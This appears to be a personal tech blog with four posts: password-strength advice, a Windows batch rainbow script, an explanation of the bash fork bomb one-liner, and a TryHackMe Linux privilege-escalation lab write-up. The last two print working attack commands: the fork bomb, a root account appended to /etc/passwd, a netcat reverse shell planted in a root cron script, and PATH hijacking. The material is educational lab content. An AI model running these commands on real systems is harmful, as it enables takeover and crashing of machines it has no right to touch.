Peixetlift's Projects

Password security and how to choose passwords

Sat, 18 Sep 2021 00:00:00 +0000

More and more security breaches are beign exposed these days, and some of these lead to catastrophic outcomes such as password leakages, in which the users’ passwords are made public or shared.

In this post I’ll cover what are the best practices to make when choosing a password, and how to manage all the passwords for all of your accounts.

First of all, I’ll address how to deal with passwords for the average user, and afterwards I’ll get into some detail of which attacks can be performed, the math involving password strength, and some extra tips to make your account security more robust.

1 - Dealing with passwords

Let’s get onto it, the three factors that affect the strength of your password are the following :

Length of the password
Character set that will be used
Predictability

To get more into detail, you can keep reading and discover which kind of attacks can affect you and what the math behind password security is, but if you only want to have secure passwords and skip all of the geeky information, these are the guidelines to follow :

Password must be more than 8 characters long.And you have to know that this is the limit for today’s computing power, but this number increases with time, so I would go for something like 15+ characters to make sure I’m safe.
It needs to include some number, symbol and capital letter.
It must not be related to you (e.g. your favourite team, your birthday, etc.) and it can’t be composed of common words such as password or hello.
It isn’t a good idea either to take a password and use some permutation of it, such as substituting letters for numbers as in h3ll0w0rld, this will be the first idea an attacker will come up with when performing a dictionary attack (which you can learn about down below).

Some extra thing that you should take into consideration when choosing your password is the convenience of remembering and typing it. So for example, QrN}x#hCyBQ7t2)> is a great password in terms of robustness, but it is really hard for humans to remember random character strings, and a pain to type every time you want to access something.

To put it in a nutshell, you want a strong, easy-to-remember password. My tip (and this is what most specialist will say) is to think of it as a passphrase instead of a password, by combining multiple characters that are easy to remember, but long and random enough to be secure.

Some examples of great passwords are :

My_Friend/Has50%ofMyIQ>:)
Alan$Tu#ringW@sNOTEWORTHY

Password Managers

With all of this said, I’d like to introduce you to password managers, which consist of applications that create and store an encrypted database of your different passwords. A password manager will keep all of your passwords safe and you will only need to remember the master password to access the database. This is increcibly helpful since it opens the possibility to have randomly generated passwords for all of your accounts, such as chm(6PM@d+dHHT%q. This way, you only need to follow the convenience guideline I just mentioned above when selecting your master password, and use a website such as passwordsgenerator.net to generate all of your other passwords (you won’t need to remeber them since they are stored permanently and securely).

As a last tip for the average user : NEVER RE-USE PASSWORDS. For real, do not ever use the same password for more than one site, each site handles its security differently, and if you use the same password for a dubious website that can have a security breach and for your Amazon account, well, you don’t need me to tell you what will happen.

2 - Types of attacks

To know how passwords can be cracked, first you need to learn how they are stored. The most common way (and the most secure one) passwords are stored inside a company’s database is with a hash of the password. A hashing function or algorithm is a mathematical function that is easy to calculate in one way, but nearly impossible to undo, it converts a random input into a fixed-length output.

What this does is allowing passwords to be stored in a form that is by all means different from their original one, and it makes it impossible for someone who sees this hash to guess what the original password was.

In conclusion, if you hash the same input twice, you will get the same output, but if you have the output of the hashing function (A.K.A. the hashed password) you cannot obtain the input. Therefore the way of guessing a password is by hashing some string and comparing this hash to the hash of the original password (provided the attacker has somehow obtained the password hash), if the hash of the string matches with the hash of the password, then the string is the password (I will not discuss hash collisions in this post but you can do further research since it is a very interesting topic). This hash comparison is the same procedure that takes place when you enter your password to log in to a site, it calculates the hash of what you entered, and compares it to the hash stored in the site’s database. This means that the attacker can directly try combinations of characters in the log in form of the site without needing to calculate hashes if the website doesn’t have any protection against brute force attacks.

Getting deeper into detail, let’s break down what kinds of attacks you can fall victim of :

Brute force attack
Dictionary attack

Brute forcing

What a pure brute force attack consists of, is essentially trying every single combination possible until access is granted. This means trying the combinations :

a

b

...

aa

ab

ac

...

aaa

aab

aac

aad

...

This process might seem endless, but since it is a computer and not a human who will be taking care of it, it can literally take seconds to crack a password if the password isn’t long enough and the character set doesn’t fit the broadness requirements.

Dictionary attacks

These kind of attacks are a variant of the brute force ones, they also consist of trying many combinations, but this time the combinations won’t be every possible string, they will be carefully selected from a list of common words and patterns taken from lists of previously leaked passwords, common english words, etc. This is why unpredictability of our passwords is of huge importance. Furthermore, attackers can and will do some research on what you like, who you follow, etc. and craft their own wordlists to attack you, I hope this makes you see how important it is to have a password completely unrelated to your insterests or personal data.

Once again, millions of combinations can be tried in seconds, so it’s not about trying to get fancy with passwords such as “adam12354” instead of “adam12345” (which by the way is a terrible password since it doesn’t meet the length, character set or predictability requirements).

3 - Math

This will probably be the most intense section of the post, by reading this you’ll learn to compare the strength of different passwords and the number of combinations that an attacker has to try in order to crack your password.

Entropy

To talk about password robustness, a little insight into the concept of Shannon’s entropy shall be made. In information theory, entropy is, by definition, the average level of information or uncertainty that a process can output. For example, The entropy of the result of throwing a biased coin will be lower than that of a normal coin, because the outcome we’re expecting from the biased coin is easier to guess before the coin has been thrown. Entropy is calculated through the formula :

Thus a standard’s coin entropy is H = 1 because p = 1/2 and (1 - p) = 1/2 (being p the probability of heads and (1 - p) the one of tails), while a biased coin entropy will be something between 0 and 1, depending on p.

To calculate the entropy of a password, we can take the number of characters in the selected character set and call this c, and the length of the password, and call it l. Then the entropy would be :

As far as password selection concerns, the importance of entropy is that we can calculate the amount of combinations that the attacker has to try in order to crack the password.

Statistically, it only takes half of all the possible combinations to find a match (a hash collision) and hence crack the password, and the amount of total combinations can be calculated with the following formula :

This clearly shows that the more entropy, the more secure our password will be.

XKCD does an incredible job summarizing this topic in here.

Let’s look at the strength of some examples with length of l = 13 characters and different character sets :

Using only numbers : c = 10
Entropy = 37.00
Attacker needs to try 6.87E+10 combinations
Using only letters : c = 26
Entropy = 96.21
Attacker needs to try 4.58E+28 combinations
Using all keyboard characters : c = 94
Entropy = 347.84
Attacker needs to try 2.57E+104 combinations

As you can see, including symbols, capital letters and numbers drastically increases the number of attempts that the attacker needs to do, this is why it is so important to follow the guidelines stated at the beginning of the post.

Attack rate

Until this point, I have talked about an attacker being able to try many combinations in a matter of seconds, but how many of them can they exactly run?

I’m sorry to tell you that this question doesn’t have an easy answer, since this speed totally depends on the attacker’s computer and the number of iterations that the hashing algorithm requires to obtain a result. What is for sure, is that it takes less time to crack a password everyday, due to the pace at which technology evolves nowadays, so it is always better to be safe than sorry and add that extra lentgh to your password.

As we’ve just seen, we cannot estimate how much time it would take an attacker to crack a password without knowing his equipment, but what we can do is make our password as secure as possible by making sure it does have a high entropy.

4 - Extra tips

If you have arrived at this point, I can assume that you are concerned about your online privacy and security, and I will give you one more tip to enhance the safety of your accounts : use multi-factor authentication whenever it is possible.

MFA (Multi-Factor Authentication)

All of this post has been about passwords’ vulnerability to being cracked, but what I haven’t talked about is that passwords can be stolen. There are several ways to do this via malware (keyloggers, camfecting, etc.) or with social engineering (tricking you into telling someone your password).

The good news is that MFA solves this problem. MFA will ask you to provide more than one piece of information to access whatever you’re trying to access. It will usually ask for some code sent to your phone, a fingerprint, or some other way of identifying you, which will completely deny access to someone who has stolen your password. It can be annoying sometimes, but it is definetly worth it to use, specially if you have some important data that you want to keep safe.

This has been all for today, thank you guys for reading me and see you next time!

Command Line Rainbow

Sun, 25 Jul 2021 00:00:00 +0000

Hi again! In this post I’ll explain some code that I’ve developed to mess with the cmd colours on windows.

The funciton of the script is mainly to draw kind of a rainbow, and it adapts to every window size. I’ll be using two separate files for this :

rainbow.bat
parse.pl

The .bat extension is used for batch files, which are, in short, “shell scripts for the windows cmd”. This excellent page will teach you everything you want to know and much more (for real, those people are crazy).
The .pl extension is the one used for Perl scripts. If you are interested in learning the language, you can visit this site.

rainbow.bat

Let’s brake down this script in two parts : obtaining the number of columns that the window has (A.K.A. how many characters fit in one line) and displaying the rainbow.

Number of columns

To check the number of columns that the window is using, the command mode will be very useful. The documentation of the command is here.

With mode con we can output some info about the size of the window. It’s been very useful to me to redirect this info into a temporary separate file ModeTemp.txt (it will be deleted when the process ends) in order to parse it afterwards with parse.pl, but I’ll get into the parser later. For now, let’s just assume that we can obtain the number of columns with the other script.

mode con >> ModeTemp.txt

Once obtained, the number of columns has to be assigned to a variable so that it can be used later on. This seems trivial, but it is definetly not when the scripting language is batch.

To accomplish this variable assignment, it is required to loop through the parser’s output, which will be in stdout. When the loop is finished, the variable cols will be set to the last line that was read.

for /f "tokens=*" %%a in ('perl parse.pl') do (
    set cols=%%a
)

Some pretty detailed information about how this for /f works can be found here.

Displaying the rainbow

Here is where the real magic happens. I’ll have to break this down into different sections once again so that it can be well understood :

The first thing I’m doing after obtaining the columns is checking if the number is odd or even. This step will let me add a “speed feature” by echoing either one or two “coloured spaces” on each loop iteration.

set /A mod=%cols% %% 2
if %mod%==1 set /A cols-=1

When loop ends :

if %mod%==1 echo [%a%m [0m

In case the number is even, no changes are required because by echoing 2 characters at a time, we’ll reach the end of the line.
However, if it is an odd number and no modifications are made, the whole line + 1 character will be echoed when speed=2, thus colouring the next line.
The required change in this last case is pretty simple, when the number of columns is odd, substract 1 to it and echo outside of the loop.

Let’s now get to this famous loop:

To be able to make a determined amount of iterations in batch, one option is to loop through a range with for /L. Once again, for more info look at this website.

Depending on the “speed” (that we obtain through stdin), each iteration will either echo 1 character cols number of times, or 2 characters cols/2 number of times.

There is one more thing to be understood before looking at the code : how do you use colours? cmd can display colours thanks to ANSI sequences, which you can learn more about checking out this page.

for /L %%n in (1 %speed% %cols%) do (
  if %speed%==1 echo | set /p="[%a%m [0m"
  if %speed%==2 echo | set /p="[%a%m  [0m"
)
set /A a+=1
if %a%==47 set /A a=41

The variable a you can see is used to modify the colour, once an entire line is printed in <ESC>[%a%m, a is incremented and the loop starts back again, now with the colour a + 1.

You may be asking yourself where is this loop re-started with a different color, and you’re right, let’s get to that :

In batch file there exist these things called labels, which you can think of as kind of a checkpoint, you can use go to <label> and the program will execute the code that is under that label. The name of the only label I use in the script is colorLoop, and it is what lets us go back to the beginning of the loop with a different value of a every time.

Here you can see the full code of rainbow.bat :

@echo off
set /A a=41

mode con >> ModeTemp.txt

set /p speed="Select speed : [1/2]"
for /f "tokens=*" %%a in ('perl parse.pl') do (
    set cols=%%a
)

set /A mod=%cols% %% 2
if %mod%==1 set /A cols-=1

del ModeTemp.txt

:colorLoop
for /L %%n in (1 %speed% %cols%) do (
  if %speed%==1 echo | set /p="[%a%m [0m"
  if %speed%==2 echo | set /p="[%a%m  [0m"
)
if %mod%==1 echo [%a%m [0m
set /A a+=1
if %a%==47 set /A a=41
goto :colorLoop

In case you’re wondering, @echo off is used to turn off echo, this way the commands won’t be displayed through the terminal

parse.pl

As promised, it is now time to review the parser. First of all, I have created it in Perl because it provides a great support for regular expressions, but it could have been done in other languages. This time, I’ll show the full code and then I’ll try my best to explain it :

#!/usr/bin/perl

use warnings;

open(FH, '<', 'ModeTemp.txt') or die $!;

while(<FH>){
   print $1 if $_ =~ /Columns:\s*(\d\d*)/;
}
close(FH);

Firstly, the program is told which interpreter to use, in this case perl.

Probably perltutorial will explain the I/0 file part better than me, so I strongly advice to read the linked page. It is only 5 minutes, you can do that instead of going to the kitchen for some cookies (actually, the optimal is to do both).

In order to understand the regexp (regular expressions) that I have used, it is first a good choice to look at the output of the mode con command, since that is what the script is parsing :

The interesting line is the one with “Columns : x”, so that is what the parser will get :

print $1 if $_ =~ /Columns:\s*(\d\d*)/;

In this piece of code, I’m telling the program to print the extracted pattern only if the line it is reading matches the full pattern /Columns:\s*(\d\d*)/, which can be explained by looking at each part :

Columns: is simply the exact string that will match
\s* means 0 or more occurrences of a blank space, tab, etc. (\s is the character and * is for saying “0 or more times the preceding expression”)
\d\d* means one digit, and then zero or more digts after that.

Obviously, the only line that matches this whole pattern is the Columns line, and therefore we are capable of obtaining the number through the $1 variable, which stores the part inside the () of the pattern. More on Perl extracting matches from regex.

If you want to try this little script out, you can have a look at my github repo. Thanks for reading me! :)

Bash Fork Bomb

Fri, 14 May 2021 00:00:00 +0000

Hello everyone! This post will be about a famous bash script the purpose of which is to harm a system by consuming a big amount of its resources.

This script is commonly known as “Fork Bomb” and this is how it works :

We create a function called :
We write the function’s code, which will be calling itself recursively and creating two child processes, which can’t be terminated by themselves because they are running in the background (this loop will be run forever)
We call the function to trigger the bomb

Bash code :

:(){ :|: & };:

Detailed explanation

1.- :() creates the function with name :
2.- Inside {}we write the code, which will be :|: &

: calls the function, | pipes its output into another call to :, and we tell it to run in the background with &

3.- More specifically, what & does is disowning the function, which makes the child processes unable to be auto-killed when the father process is terminated. You can find more information in here
4.- Finally, we use the ; as a command separator and we run the function with :

DISCLAIMER

Please do not use this command unless you are ready to see your PC crash and reboot it.
The command doesn’t require super-user privileges to run.

I hope this little article was of good interest to you, see you later :)

Common Linux PrivEsc detailed write-up | TryHackMe

Wed, 24 Mar 2021 00:00:00 +0000

Common Linux Privesc Room

Tasks 1, 2 and 3 don’t need explanation.

Task 4 : Enumeration

To get LinEnum on the target’s machine, you need to start a server on your local machine (it has to be in the directory where you store LinEnum.sh or you will have to provide the path to it afterwards) and connect to it from the target :

python3 -m http.server 8000

The -m option is used to search a module and run the corresponding python script, which in this case is an http server. The number 8000 is the port that our server will be listening in, you can select any port that’s not being used.

Once the server is started, you can request the file you want from the target’s console :

wget <YOUR MACHINE'S @IP>:8000/LinEnum.sh

wget is a network downloader By using this command, we are downloading the file LinEnum.sh from the server in <YOUR MACHINE’S @IP> that we started before.

Now that LinEnum.sh is on the target’s machine, we need to make it executable (because we need to run it in order to start the enumeration process), this is done by using :

chmod +x LinEnum.sh

To see how Linux file permissions work, you can visit this page

Let’s now look at how many “user[x]” are there in the system :

cat /etc/passwd | grep user*

What we are doing with cat is showing in stdout (Standard Output) the contents of the file /etc/passwd and piping them into a grep command.

grep allows us to look for patterns in texts, by typing grep user* we are searching for any pattern that contains the word “user” and any other character next to it (this is why we use the wildcard *)

Answer : there are 8 user[x] in the system.

For a better understanding of wildcards in Linux, you can visit this page

The next step is to find how many shells there are in the system, to guess so, we need to start enumerating with LinEnum.sh. You can run the script with :

./LinEnum.sh

Remember that you have previously dowloaded it, given the proper permissions and you are working in the directory where it is located.

A better way of keeping our enumeration clean and easily manageable is to write the output of LinEnum.sh to a .txt file :

./LinEnum.sh > LinEnum.txt

The file can be named as what you want, but I recommend using a name such as “LinEnum” or “Enumeration”.

Once we have run the script, we can look for how many shells there are in the system :

cat linEnum.txt | grep shell

Answer : There are 4 shells in the system

We are now asked what is the name of the bash script that is set to run every 5 minutes by cron. cron is used to automate tasks in Linux, its syntax can be a little bit tricky so if you need some more info you can have a look at this site

cron jobs are displayed in each user’s /etc/crontab file, but since we run LinEnum.sh to do the work for us, we can just look for it at its output :

cat linEnum.txt | grep crontab -C 10

If you have read the previous tasks, you already know what this is doing, the only novelty is the -C option, which specifies how many lines of context you want to display.

Answer : The autoscript.sh file is located in the "/home/user4/Desktop" directory

Finally, we want to search for a file that has had its permissions changed, and now users are allowed to write to it :

find / -perm -200 2>/dev/null
ls -l /etc/passwd

With the find command, we can look for files with concrete permissions by using the option -perm, to find files with user writing permissions we can look for -200, which shows every file which permissions are set to 200 or more.

With 2>/dev/null, we redirect the stderr (Standard Error) to /dev/null, which is kind of a “black hole” that discards all the data that is writen to it.

For more info on stderr, visit this page. For more info on /dev/null, check here.

A lot of files will be shown, but since /etc/passwd is such an important file, we should check its permissions with ls -l and see that it can be writen to.

Task 5 : Abusing SUID/SGID Files

Checking for files with the SUID/SGID bit set is the go-to when first getting a shell on a machine if what we want is to escalata privileges.

If the SUID bit is set on a file, it means that the file will be executed with the same permissions as the owner of the file. If the SGID bit is set on a file, the file will be executed with the permissions of the group that owns the file.

Important : SUID and SGID have different behaviour when they are set in directories

In order to find files with the SUID bit set, we can have a look at our LinEnum scan, or we can search them manually :

find / -perm -u=s -type f 2>/dev/null

Again, we are using find with its -perm option, this time we specify that we want any of the permission bits set (-u=s) and we use -type f so that it only returns files.

It seems that there is an uncommon file with the SUID bit set :

Answer : /home/user3/shell

Due to shell having the SUID set, we can execute it and gain superuser privileges on the machine :

ls -l /home/user3/shell
./shell

To check if a file has the SUID/SGID bit set, we look at its permissions.

If they are : rws-rwx-rwx, the SUID bit is set.

If they are : rwx-rws-rwx, the SGID bit is set.

Notice that they are marked with the character s.

Task 6 : Exploiting writeable /etc/passwd

The /etc/passwd file stores valuable account information, it doesn’t contain passwords, it contains a list of the accounts of the system and it provides information about each and every of them, such as user ID, group ID, home directory, etc. This file needs to have read permissions because other utilities require them to work properly, however it must not have write permissions except for the root account. When a user can write in the /etc/passwd file, it can lead to a security breach, which is what we are going to exploit right about now :

What direction privilege escalation is the attack?

Horizontal privilege escalation Occurs when we take over a user who is on the same privilege level as us.

Vertical privilege escalation takes place when we want to access an account which privileges are higher than ours.

Answer : Vertical

The way to exploit the vulnerability that we have found (which is that /etc/passwd can be writen to by a non-superuser account) is adding a new line of text to /etc/passwd with the intention of creating a new account in the system, with the password that we decide, and superuser privileges.

How is the /etc/passwd structured?</pink>

Each line of the file refers to a user, and every line contains 7 fields, all of which separated by a colon (:). You can see the meaning of every field in here.

Since passwords are stored with their respective hashes and not in plain text, we will need to create a hash for our password :

openssl passwd -1 -salt new 123

A hash is a mathematical function that converts some text input into an output of a fixed length, this function can’t be reverted (you can obtain a password’s hash, but you can’t obtain a hash’s password).

openssl passwd computes the hash of the password that we provide to it.

-salt is used to provide a salt, which is a piece of data that will be taken into account when computing the hash.

Salts are really useful because the same string always generates the same hash, but with different salts, we can obtain different hashes for two identical passwords.

Answer : $1$new$p7ptkEKU1HnaHpRtzNizS1

Now that we have our hash computed, we can create a new entry in /etc/passwd and generate a new account with elevated privileges :

echo new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash >> /etc/passwd

As seen earlier, we can redirect a command’s output and write it where we please, the >> operator concatenates the stdout of the command to the file that we specify.

Be careful not to use the > operator, this will rewrite the whole file!

Here we go! We have created a new user with root privileges and now we only need to log in :

su new

su stands for “switch user”, so what we have done is change our account to the one we created and voilà, we have escalated privileges.

Task 7 : Escaping vi editor

Another must when it comes to privilege scalation is running sudo -l when we get a shell, this command will display what commands we can run as superuser.

sudo -l

Answer : NOPASSWD

Sometimes, some tools can spawn a shell, just like what happens in this case with vi, we can enter the editor and use the command :sh!.

For more info on vi, I like this site.

sudo vi

we execute vi as superuser (because we saw that we have that privilege).

once inside vi, we can spawn the shell and it will be run as root

Task 8 : Exploiting crontab

As mentioned at the beginning, cron is a daemon (background process) that automates tasks. By looking at /etc/crontab, we can see which tasks are scheduled and research for anything of interest.

Thanks to the LinEnum scan, we found that there is a script called autoscript.sh that is set to run as root every 5 minutes and it has writing permissions.

What is a payload?

A payload is the piece of code that we want the target to run, there are multiples types of payloads, which you can learn about in here

The path to scalating privileges here is to craft a payload that gets us a reverse shell (which will have root privileges because the script runs as root) and modify the script by inserting this payload in it.

We will need to create a payload in order to insert it in the script, and the tool we’re using is called msfvenom, it is a really complete and complex tool, and you can learn more about it here

msfvenom man | grep payload

Trying to find which option allows us to specify a payload

Answer : -p

msfvenom -p cmd/unix/reverse_netcat lhost=<YOUR MACHINE'S @IP> lport=8888 R

We create the payload for a reverse shell and we want it to connect to port 8888.

If we don’t remember where the script is, we can just look for it :

find / -name autoscript.sh 2>/dev/null

Once again showing how useful find is, now with the -name switch, which lets us search a file by its name.

Answer : /home/user4/Desktop/autoscript.sh

We know where the script is now, so we need to rewrite its content with our payload :

echo mkfifo /tmp/zxfbetj; nc <YOUR MACHINE'S @IP> 8888 0</tmp/zxfbetj | /bin/sh >/tmp/zxfbetj 2>&1; rm /tmp/zxfbetj > autoscript.sh

Notice that we use the > operator, because this time we do want to rewrite the file.

What autoscript.sh now does, is generating a shell with root privileges in the @IP that we specified, and this script is run every 5 minutes, so now we will start a listener in our local machine and wait for the shell to spawn!

nc -lvp 8888

nc is a pretty simple tool that is used to exchange data in the network.

-lvp is a combination of the options -l, used to start a listener server, -v, used to increment the verbose of the output and -p, which lets us select the port that we want to open.

After waiting for a maximum of 5 minutes, the shell should spawn.

Task 9 : Exploiting PATH Variable

The $PATH variable is an environmental variable that indicates which directories contain executable programs, this way when you run a program that’s in the $PATH variable, you don’t need to know the path to the program in order to use it.

Imagine this time we have a binary that we can execute with elevated privileges (because it has the SUID bit set ;)), however, this binary doesn’t provide a way of spawning a shell (like vi in task 7).

What we can do is create a binary with the same name than an already existing one, but locate it in a different place (/tmp for example). Afterwards we can modify the $PATH variable and tell it that the location of the binary (the original one) is /tmp.

Do you see what we are doing?

Now when we run the program, the system will check the $PATH and it will run the one that we created with escalated privileges, instead of the original one.

Checking that script has the SUID bit set :

ls -l script

Running the script file in user5’s home directory :

./script

When running the file, we see that it lists the contents of the current directory.

Answer : ls

Like we said, we will create an imitation of this script and name it ls, giving it executable permissions :

cd /tmp
echo "/bin/bash" > ls
chmod +x ls
ls -l

All of the commands have been explained in detail through this write-up, but what we have accomplished is to create a script named ls that spawns a shell when executed.

We have created the imitation, now we want to add its location to the $PATH :

export PATH=/tmp:$PATH
echo $PATH

We add /tmp and check that we have done it correctly.

The last step is to run the script, which will be run as root because ls is contained in $PATH and script executes with superuser privileges.

Thank you for reading my write-up!

I really hope you enjoyed it and learnt something ;)